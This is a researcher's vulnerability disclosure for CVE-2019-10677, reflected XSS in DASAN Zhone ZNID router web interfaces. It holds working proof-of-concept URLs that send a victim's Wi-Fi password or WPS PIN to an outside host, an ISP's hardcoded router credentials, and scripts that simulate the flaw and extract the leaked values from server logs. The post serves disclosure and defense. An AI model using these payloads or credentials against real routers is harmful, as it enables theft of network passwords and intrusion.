CVE-2019-10677 Multiple Cross-Site Scripting (XSS) in the web interface of DASAN Zhone ZNID

blog.redteam.pl, 5 years ago
With a fresh software update for DASAN Zhone Solutions (DZS) routers, the company pushed fixes for multiple vulnerabilities I found in them [https://redteam.pl/poc/dasan-zhone-znid-gpon-2426a-eu.html, https://www.exploit-db.com/exploits/47351]. The vulnerabilities were registered under CVE-2019-10677 [https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10677]. Multiple Cross-Site Scripting (XSS) in the web interface of DASAN Zhone ZNID allows a remote attacker to execute arbitrary JavaScript via manipulation of unsanitized GET parameters. This vulnerability affects all zNID models running the following firmware versions: all releases of 3.0.xxx SW (on the 3.0 branch), release 3.1.349 and earlier (on the 3.1 branch), release 3.2.087 and earlier (on the 3.2 branch), release 4.1.253 and earlier (on the 4.1 branch), release 5.0.019 and earlier (on the 5.0 branch).

You can find a short description of these issues and proof-of-concept code below.

The application limits the number of characters it copies from user-supplied parameters into its variables. When we pass 50 A's and 50 B's in the vulnerable GET parameters:

http://admin:admin@192.168.1.1/wlsecrefresh.wl?wl_wsc_reg=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&wlWscCfgMethod=BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB

We get the following response:

GET /wlsecrefresh.wl?wl_wsc_reg=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&wlWscCfgMethod=BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB HTTP/1.1

[...]
<script language="javascript">
<!-- hide
/* ZHONE_CUSTOM_MODS start*/
var userid = 'admin';
/* ZHONE_CUSTOM_MODS end */

var syncNvram = '1';
var ssidIdx = '0';
// ZHONE_CUSTOM_MODS
var enblWireless = '1';
/* ZHONE_CUSTOM_MODS
var enblWireless = '1';
ZHONE_CUSTOM_MODS */
var radiusServerIP = '0.0.0.0';
var mode = 'psk2';
var bit = '0';
var keyIdx = '1';
var keys = new Array( "zhone55556666", "zhone55556666",
"zhone55556666", "zhone55556666" );
var wpaPskKey = 'WIFI_P@SSW0RD';
var wpaGTKRekey = '3600';
var radiusPort = '1812';
var radiusKey = '';
var wep = 'disabled';
var wpa = 'aes';
var auth = '0';
var wlCorerev = '30';

var wlRefresh = '0';
var varPreauth = '0';
var varNetReauth = '36000';

var WscDevPin = '31337';
var WscStaPin = '';
var WscMode = 'disabled';
var WscIRMode = 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA';
var WscAPMode = '1';
var sessionKey='0123456789';
var WscCfgMethod = 'BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB';
var WscVer2 = 'enabled';
var WscIsForceWpsDisable = '0';
var phy = 'n';
var nmode = 'auto';
var wlWapiAvail = '0';
var preAuthMode;
var applyRequired = 0;
[...]

Both variables, WscIRMode and WscCfgMethod, are truncated to 32 characters. 32 characters is not enough for an XSS payload that steals variable data such as the Wi-Fi password, but by using both variables together we can do it as follows:

http://admin:admin@192.168.1.1/wlsecrefresh.wl?wl_wsc_reg=';document.location=/*&wlWscCfgMethod=*/'//redteam.pl/'%2BwpaPskKey;//

This splits our payload into two separate parts:
1. ';document.location=/* = 22 characters (or just ';location=/* = 13 characters)
2. */'//redteam.pl/'%2BwpaPskKey;// = 32 characters (also keep in mind that a real attacker can use a shorter domain, e.g. a single letter like a.pl)

With this payload, the vulnerable application returns:

GET /wlsecrefresh.wl?wl_wsc_reg=%27;document.location=/*&wlWscCfgMethod=*/%27//redteam.pl/%27%2BwpaPskKey;// HTTP/1.1

[...]
var WscIRMode = '';document.location=/*';
var WscAPMode = '1';
var sessionKey='0123456789';
var WscCfgMethod = '*/'//redteam.pl/'+wpaPskKey;//ma';
[...]

The parts that now fall inside comments (everything between /* and */, and the trailing ma'; after //) are not executed; what remains is pure JavaScript code.
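To make the split concrete, here is an added Node.js example (not code from the original post or from the DZS firmware). It models the reflection of the two parameters into JavaScript string literals cut at 32 characters, runs the resulting script against a stand-in document object, and places a hardened renderer next to the vulnerable one. The 32-character cut, the hardened renderer, the stand-in document and the single-parameter "naive" URL are assumptions of this example; the variable names and values come from the response shown above.

```javascript
// Added example, not code from the original post or from DZS firmware: a
// model of how wlsecrefresh.wl reflects two GET parameters into JavaScript
// string literals, each cut to 32 characters (assumption inferred from the
// response above), showing why the payload must be split and why a /* ... */
// comment bridges the gap between the two reflection points.
const LIMIT = 32;
const cut = (s) => (s == null ? "" : String(s)).slice(0, LIMIT);

// Vulnerable rendering: the parameter is copied raw into a '...' literal.
function vulnerableRender(params) {
  return [
    "var wpaPskKey = 'WIFI_P@SSW0RD';",
    "var WscDevPin = '31337';",
    `var WscIRMode = '${cut(params.wl_wsc_reg)}';`,
    "var WscAPMode = '1';",
    "var sessionKey='0123456789';",
    `var WscCfgMethod = '${cut(params.wlWscCfgMethod)}';`,
    "var WscVer2 = 'enabled';",
  ].join("\n");
}

// Hardened rendering (an illustration, not the vendor's actual fix): emit the
// value as a JSON string literal and escape '<', '>' and '/' so the value can
// close neither the string literal nor the enclosing <script> element.
function hardenedRender(params) {
  const lit = (s) =>
    JSON.stringify(cut(s))
      .replace(/</g, "\\u003c")
      .replace(/>/g, "\\u003e")
      .replace(/\//g, "\\/");
  return [
    "var wpaPskKey = 'WIFI_P@SSW0RD';",
    "var WscDevPin = '31337';",
    `var WscIRMode = ${lit(params.wl_wsc_reg)};`,
    "var WscAPMode = '1';",
    "var sessionKey='0123456789';",
    `var WscCfgMethod = ${lit(params.wlWscCfgMethod)};`,
    "var WscVer2 = 'enabled';",
  ].join("\n");
}

// Runs the reflected script the way a victim's browser would, with a plain
// object standing in for `document` so an assignment to document.location is
// recorded instead of navigating anywhere. Throws on a syntax error.
function execute(script) {
  const doc = { location: null };
  new Function("document", script)(doc);
  return doc.location;
}

// The two parameters exactly as a browser sends them for a given URL
// (%2B decodes to '+', which the payload needs for string concatenation).
function paramsFromUrl(url) {
  const q = new URL(url).searchParams;
  return { wl_wsc_reg: q.get("wl_wsc_reg"), wlWscCfgMethod: q.get("wlWscCfgMethod") };
}

// The PoC URL from the post (22 + 30 characters, both under the limit).
const POC_URL =
  "http://admin:admin@192.168.1.1/wlsecrefresh.wl?wl_wsc_reg=';document.location=/*&wlWscCfgMethod=*/'//redteam.pl/'%2BwpaPskKey;//";

// Assumed single-parameter attempt: 48 characters, so the router keeps only
// the first 32 and the part that appends wpaPskKey never reaches the browser.
const NAIVE_URL =
  "http://192.168.1.1/wlsecrefresh.wl?wl_wsc_reg=';document.location='//redteam.pl/'%2BwpaPskKey;//";

function demo() {
  const split = execute(vulnerableRender(paramsFromUrl(POC_URL)));
  const naive = execute(vulnerableRender(paramsFromUrl(NAIVE_URL)));
  const fixed = execute(hardenedRender(paramsFromUrl(POC_URL)));
  return { split, naive, fixed };
}

console.log(demo());
```

Run it with node; the split payload redirects the stand-in document to //redteam.pl/WIFI_P@SSW0RD, the single-parameter attempt is cut down to //redteam.p with no password, and the hardened renderer never assigns document.location at all.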

Once a victim visits the URL, they are redirected to the redteam.pl website with their plaintext Wi-Fi password, taken from the wpaPskKey variable, appended to the request path:

GET /WIFI_P@SSW0RD HTTP/1.1
Host: redteam.pl
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Referer: http://192.168.1.1/wlsecrefresh.wl?wl_wsc_reg=%27;document.location=/*&wlWscCfgMethod=*/%27//redteam.pl/%27%2BwpaPskKey;//
Connection: close

Now, by searching the httpd logs for requests carrying this Referer header, we can find the Wi-Fi password in the request path.
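As an added example (not from the original post), the following Node.js script does that search over httpd access logs in Apache combined format: it picks out requests whose Referer points at wlsecrefresh.wl, recovers the leaked value from the request path, and reads the name of the leaked variable back out of the Referer. The log lines are constructed for this example and the combined-format regex is an assumption about the log layout.

```javascript
// Added example, not from the original post: scans an httpd access log in
// Apache "combined" format for requests whose Referer is the vulnerable
// wlsecrefresh.wl page and recovers the leaked value from the request path.
// The log lines below are constructed for this example, not captured data.
const SAMPLE_LOG = [
  '203.0.113.7 - - [15/Oct/2019:10:12:31 +0200] "GET /WIFI_P@SSW0RD HTTP/1.1" 404 196 "http://192.168.1.1/wlsecrefresh.wl?wl_wsc_reg=%27;document.location=/*&wlWscCfgMethod=*/%27//redteam.pl/%27%2BwpaPskKey;//" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0"',
  '198.51.100.2 - - [15/Oct/2019:10:13:02 +0200] "GET /index.html HTTP/1.1" 200 5120 "-" "curl/7.64.0"',
  '203.0.113.9 - - [15/Oct/2019:10:15:44 +0200] "GET /31337 HTTP/1.1" 404 196 "http://192.168.1.1/wlsecrefresh.wl?wl_wsc_reg=%27;document.location=/*&wlWscCfgMethod=*/%27//redteam.pl/%27%2BWscDevPin;//" "Mozilla/5.0"',
  'garbage line that does not match the log format',
].join("\n");

// One combined log line: client ident user [time] "method path proto" status size "referer" "user-agent"
const COMBINED = /^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "([^"]*)" "([^"]*)"$/;

function parseLine(line) {
  const m = COMBINED.exec(line);
  if (!m) return null;
  return { client: m[1], time: m[2], method: m[3], path: m[4], status: m[5], referer: m[6], ua: m[7] };
}

// Name of the variable the payload appended (e.g. wpaPskKey or WscDevPin),
// read back out of the wlWscCfgMethod parameter, which ends in "'+NAME;//".
function leakedVariable(refererUrl) {
  const m = /\+(\w+);/.exec(refererUrl.searchParams.get("wlWscCfgMethod") || "");
  return m ? m[1] : null;
}

// Returns one record per request that was referred by the vulnerable page.
function findLeaks(logText) {
  const leaks = [];
  for (const line of logText.split("\n")) {
    const e = parseLine(line);
    if (!e || !e.referer.includes("/wlsecrefresh.wl?")) continue;
    let ref;
    try { ref = new URL(e.referer); } catch (_) { continue; }
    // The leaked value is the path minus the leading slash; the browser may
    // have percent-encoded it, so decode, falling back to the raw path.
    let value;
    try { value = decodeURIComponent(e.path.slice(1)); } catch (_) { value = e.path.slice(1); }
    leaks.push({ client: e.client, time: e.time, router: ref.host, variable: leakedVariable(ref), value });
  }
  return leaks;
}

for (const l of findLeaks(SAMPLE_LOG)) {
  console.log(`${l.time} ${l.client} via router ${l.router}: ${l.variable} = ${l.value}`);
}
```

The same filter, pointed at a defender's proxy or egress logs instead of the attacker's httpd, also works as a detection: any outbound request whose Referer is the router's wlsecrefresh.wl page with quote or comment characters in wl_wsc_reg or wlWscCfgMethod is this attack in progress.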

This attack can be combined with, for example, a DNS rebinding attack, since the router's IP address will most likely be the same across installations.

The large Polish ISP Multimedia uses hardcoded credentials on all of its routers:

http://user:Multimedia@192.168.1.1/wlsecrefresh.wl?wl_wsc_reg=';document.location=/*&wlWscCfgMethod=*/'//redteam.pl/'%2BwpaPskKey;//

There are also other possible attack scenarios, for example leaking the WPS PIN:

http://192.168.1.1/wlsecrefresh.wl?wl_wsc_reg=';document.location=/*&wlWscCfgMethod=*/'//redteam.pl/'%2BWscDevPin;//